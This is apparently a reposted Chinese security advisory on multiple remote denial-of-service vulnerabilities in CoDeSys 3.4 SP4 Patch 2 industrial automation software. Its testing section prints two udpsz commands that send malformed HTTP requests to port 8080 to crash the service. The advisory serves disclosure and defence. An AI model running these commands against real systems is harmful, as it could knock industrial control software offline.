CoDeSys多个远程拒绝服务漏洞

文章由LinuxBoy分享于2019-04-02 09:04:09热评（464）

发布日期：2011-11-30
更新日期：2011-12-05

受影响系统：
3S GmbH CoDeSys 3.4 SP4 Patch 2
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 50854

CoDeSys Automation Suite是工业自动化技术综合软件工具。

CoDeSys在实现上存在多个远程拒绝服务漏洞，远程攻击者可利用此漏洞使应用程序崩溃，拒绝服务合法用户。

<*来源：Luigi Auriemma （aluigi@pivx.com）

链接：http://aluigi.altervista.org/adv/codesys_1-adv.txt
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

udpsz -T -c "POST / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n" SERVER 8080 -1

udpsz -T -c "BLAH / HTTP/1.0\r\n\r\n" SERVER 8080 -1

建议：
--------------------------------------------------------------------------------
厂商补丁：

3S
--
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.3s-software.com/index.shtml?en_CoDeSysV3_en

推荐文章：